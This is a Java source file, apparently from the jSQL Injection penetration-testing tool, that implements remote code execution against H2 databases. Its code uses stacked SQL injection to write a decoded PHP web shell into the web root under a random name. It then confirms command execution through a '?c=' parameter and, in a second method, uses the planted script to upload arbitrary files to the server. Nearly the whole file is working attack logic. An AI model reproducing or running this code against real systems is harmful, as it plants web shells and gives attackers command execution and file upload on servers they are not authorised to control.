View Javadoc
1   package com.jsql.model.accessible.vendor;
2   
3   import com.jsql.model.InjectionModel;
4   import com.jsql.model.accessible.DataAccess;
5   import com.jsql.model.accessible.ResourceAccess;
6   import com.jsql.model.accessible.vendor.h2.ModelYamlH2;
7   import com.jsql.model.bean.util.Interaction;
8   import com.jsql.model.bean.util.Request;
9   import com.jsql.model.exception.JSqlException;
10  import com.jsql.model.exception.JSqlRuntimeException;
11  import com.jsql.util.LogLevelUtil;
12  import com.jsql.util.StringUtil;
13  import org.apache.commons.lang3.RandomStringUtils;
14  import org.apache.commons.lang3.StringUtils;
15  import org.apache.logging.log4j.LogManager;
16  import org.apache.logging.log4j.Logger;
17  import org.yaml.snakeyaml.Yaml;
18  
19  import java.io.File;
20  import java.io.FileInputStream;
21  import java.io.IOException;
22  import java.io.InputStream;
23  import java.net.http.HttpResponse;
24  import java.util.function.BinaryOperator;
25  
26  public class ExploitH2 {
27  
28      /**
29       * Log4j logger sent to view.
30       */
31      private static final Logger LOGGER = LogManager.getRootLogger();
32      private final InjectionModel injectionModel;
33      private final ModelYamlH2 modelYaml;
34  
35      public ExploitH2(InjectionModel injectionModel) {
36          this.injectionModel = injectionModel;
37          var yaml = new Yaml();
38          this.modelYaml = yaml.loadAs(
39              injectionModel.getMediatorVendor().getH2().instance().getModelYaml().getResource().getExploit(),
40              ModelYamlH2.class
41          );
42      }
43  
44      public String createWeb(String pathExploit, String urlExploit) {
45          LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
46  
47          String bodyExploit = StringUtil.base64Decode(
48                  this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
49              )
50              .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
51              .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
52  
53          var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
54          this.injectionModel.injectWithoutIndex(String.format(
55              this.modelYaml.getRce().getCreateTable(),
56              nameTable,
57              nameTable, bodyExploit.replace("'", "\"")
58          ), ResourceAccess.TBL_CREATE);
59          var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
60          this.injectionModel.injectWithoutIndex(String.format(
61              this.modelYaml.getRce().getScriptSimple(),
62              pathExploit + nameExploit,
63              nameTable
64          ), ResourceAccess.TBL_DUMP);
65  
66          BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
67              String result = this.injectionModel.getResourceAccess().callCommand(
68                  urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
69              );
70              if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
71                  LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
72                  return StringUtils.EMPTY;
73              }
74              var request = new Request();
75              request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
76              request.setParameters(urlSuccess);
77              this.injectionModel.sendToViews(request);
78              return urlSuccess;
79          };
80  
81          return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
82      }
83  
84      public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
85          String bodyExploit = StringUtil.base64Decode(
86                  this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
87              )
88              .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
89              .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
90  
91          var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
92          this.injectionModel.injectWithoutIndex(String.format(
93              this.modelYaml.getRce().getCreateTable(),
94              nameTable,
95              nameTable, bodyExploit.replace("'", "\"")
96          ), ResourceAccess.TBL_CREATE);
97          var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
98          this.injectionModel.injectWithoutIndex(String.format(
99              this.modelYaml.getRce().getScriptSimple(),
100             pathExploit + nameExploit,
101             nameTable
102         ), ResourceAccess.TBL_DUMP);
103 
104         BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
105             try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
106                 HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
107                 if (result.body().contains(DataAccess.LEAD +"y")) {
108                     LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
109                 } else {
110                     LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
111                 }
112             } catch (InterruptedException e) {
113                 LOGGER.log(LogLevelUtil.IGNORE, e, e);
114                 Thread.currentThread().interrupt();
115             } catch (IOException | JSqlException e) {
116                 throw new JSqlRuntimeException(e);
117             }
118             return urlSuccess;
119         };
120 
121         this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
122     }
123 
124     public ModelYamlH2 getModelYaml() {
125         return this.modelYaml;
126     }
127 }